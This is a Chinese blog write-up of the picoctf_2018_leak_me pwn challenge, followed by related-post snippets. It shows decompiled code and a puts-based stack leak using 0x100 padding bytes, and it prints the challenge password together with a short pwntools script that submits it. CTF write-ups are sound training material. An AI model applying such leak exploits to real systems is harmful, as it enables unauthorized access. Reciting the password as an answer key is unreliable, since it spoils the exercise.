picoctf_2018_leak_me

于 2023-09-20 09:28:01 发布
阅读量145 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62887641/article/details/133065054
版权
文章描述了一个在PicoCTF比赛中的32位程序,具有NX保护但无PIE。利用puts的特性,通过输入特殊字符序列获取密码,实现本地shell。漏洞利用方法包括输入0x100字节覆盖变量并提取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

picoctf_2018_leak_me

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

// bad sp value at call has been detected, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s1[64]; // [esp+0h] [ebp-194h] BYREF
  char v5[256]; // [esp+40h] [ebp-154h] BYREF
  char s[64]; // [esp+140h] [ebp-54h] BYREF
  FILE *stream; // [esp+180h] [ebp-14h]
  char *v8; // [esp+184h] [ebp-10h]
  __gid_t v9; // [esp+188h] [ebp-Ch]
  int *p_argc; // [esp+18Ch] [ebp-8h]

  p_argc = &argc;
  setvbuf(stdout, 0, 2, 0);
  v9 = getegid();
  setresgid(v9, v9, v9);
  memset(s, 0, sizeof(s));
  memset(v5, 0, sizeof(v5));
  memset(s1, 0, sizeof(s1));
  puts("What is your name?");
  fgets(v5, 0x100, stdin);
  v8 = strchr(v5, 10);
  if ( v8 )
    *v8 = 0;
  strcat(v5, ",\nPlease Enter the Password.");
  stream = fopen("password.txt", "r");
  if ( !stream )
  {
    puts(
      "Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
    exit(0);
  }
  fgets(s, 64, stream);
  printf("Hello ");
  puts(v5);
  fgets(s1, 0x40, stdin);
  v5[0] = 0;
  if ( !strcmp(s1, s) )
    flag();
  else
    puts("Incorrect Password!");
  return 0;
}

有个后门,只要我们输入正确的密码就getshell了

看我们输入的点,v5和s的位置

char v5[256]; // [esp+40h] [ebp-154h] BYREF
char s[64]; // [esp+140h] [ebp-54h] BYREF

这两个是紧挨着的并且password是读入到s的

思路

利用puts的特性,遇到\x00截断才终止输出,我们输入是0x100个字节,就可以把s后面的内容输出出来了

exp:

b'a'*0x100进去
得到a_reAllY_s3cuRe_p4s$word_f85406
这个就是密码

在这里插入图片描述

2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 714
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 923
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
BUUCTF(pwn) picoctf_2018_leak_me
半岛铁盒的博客
04-06 388
这题难度不大,分析好流程就可以; name,与密码 是紧挨着的,相差0x100,即256 我们可以利用puts() 进行溢出泄漏密码; 因为 puts() 函数输出遇到\x00停止; from pwn import * p = remote(“node3.buuoj.cn”,27388) p.sendline(‘a’) p.recv() p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’) p.interactive() ...
[BUUCTF]PWN——picoctf_2018_leak_me(puts的‘\x00’绕过输出敏感数据)
mcmuyanga的博客
02-02 476
picoctf_2018_leak_me 附件 步骤 例行检查,32位,开启了nx保护 本地运行看一下大概的情况 32位ida载入 程序执行的大概流程就是先输入name,然后输入password,靶机上应该会有一个password.txt去检测是否输入是否正确,输入正确,就会调用flag函数,flag函数回将flag打印出来 参数v5(存放name)和参数s(存放flag)在栈上的位置相差不远,而且给参数v5读入数据的时候可以覆盖道参数s 他们相差0x154-0x54=0x100,而且我们对v
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 500
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1485
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
Y_peak的博客
03-29 427
[BUUCTF-pwn]——picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。 peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。 思路 在IDA中,v6代表name s是password.距离0x100也就是256。 输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函
非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
PLpa的博客
08-04 555
前言: 对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。 解题思路 查看保护 只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。 进入IDA查看伪代码 打开IDA,如果是第一次见这种题目就会傻眼了。 题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。 题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。 乍一看,好像没什么办法了,但是我们可以用程序中非常多的g
攻防世界--simple-check-100
qq_48274326的博客
01-02 738
攻防世界–simple-check-100 ida找到main函数 // bad sp value at call has been detected, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { void *v3; // esp int v5; // [esp-14h] [ebp-50h] int v6; // [esp-10h] [ebp-4Ch]
IDA无法反编译 and 提示错误
weixin_52369224的博客
11-01 6913
情况一: 有的时候IDA的函数点进去 ,发现无法去反编译,可能是代码出问题了,考察我们对汇编的阅读 能力例如下面: aaa指令明显错误(注:CODE CREF代码交叉引用)我们把这里jbe和aaa nop掉 然后再选中红色部分,按p键定义为函数,然后重新反编译即可 ...
picoCTF,Reverse Engineering,逆向类,42/55
Allezima阿力代码
02-10 2047
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
buu-[网鼎杯 2020 青龙组]jocker
m0_73393932的博客
05-31 1280
逆向
picoCTF2023_补题
xiaoxiaoZ_L的博客
04-04 439
补题
picoCTF2022】Crypto部分
Sparks_Pion的博客
03-27 1120
basic-mod1 str = '128 63 242 87 151 147 50 369 239 248 205 346 299 73 335 189 105 293 37 214 333 137' d = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_' print(''.join([d[int(x) % 37] for x in str.split(' ')])) basic-mod2 from gmpy2 import * from sympy import inv
[网鼎杯 2020 青龙组]jocker
yidalipao1的博客
05-27 686
[网鼎杯 2020 青龙组]jocker SMC(self-Modifying Code): 自修改代码,程序在执行某段代码的过程中会对程序的代码进行修改,只有在修改后的代码才是可汇编,可执行的。在程序未对该段代码进行修改之前,在静态分析状态下,均是不可读的字节码。 查壳:32位无壳程序,直接拖ida 首先shift+f12搜索字符串,但是除了main函数中的一句请输入flag提示之外在没有什么有用的。 main函数 // positive sp value has been detecte
Buuctf [网鼎杯 2020 青龙组]jocker 题解
OrientalGlass的博客
03-11 2127
1.提示:,出现了堆栈不平衡的情况2.函数的作用是取消encrypt函数所在区域的读写保护,为下方给函数脱壳做准备3.首先输入一个字符串input,判断长度是否为24,然后复制到str中;4.wrong函数对input串加密,加密后由omg函数进行判断是否满足条件,但是根据这两条函数得到的flag是假的,也就图一乐5.真正的flag要根据encrypt和finally函数以及str串(原始的input)来求得二.wrong函数和omg函数--假flag1.wrong函数很普通的一个加密。
达梦MEMORY_LEAK_CHECK开启
最新发布
11-29
达梦数据库(DM)中的MEMORY_LEAK_CHECK选项通常是一个配置项,用于检测内存泄漏。当你想要开启这个选项时,通常需要通过调整数据库的配置文件或使用系统管理工具来进行设置。以下是在达梦数据库中启用MEMORY_LEAK_CHECK的基本步骤: 1. **登录系统**: 登录到达梦数据库服务器作为拥有足够权限的管理员用户。 2. **打开配置文件**: 找到数据库的配置文件,如`dm.ini`或`sys.ini`(取决于你的版本)。这是一个文本文件,用于存储数据库的系统参数。 3. **查找MEMORY_LEAK_CHECK参数**: 在配置文件中搜索有关内存检查的参数,它通常看起来像这样: ``` memory_leak_check = on/off ``` 其中`on`表示启用,`off`表示禁用。 4. **编辑并保存**: 将其改为`on`,然后保存配置文件。 5. **重启服务**: 为了使更改生效,需要重启达梦数据库的服务,例如使用命令行工具或图形界面重启服务。 6. **检查效果**: 启动数据库后,你可以观察日志或者使用内置工具检查内存泄漏是否存在。如果有启用,数据库会定期检查内存状态。 注意,开启内存泄漏检查可能会增加系统的开销,所以在生产环境中需要谨慎操作,并根据实际情况调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值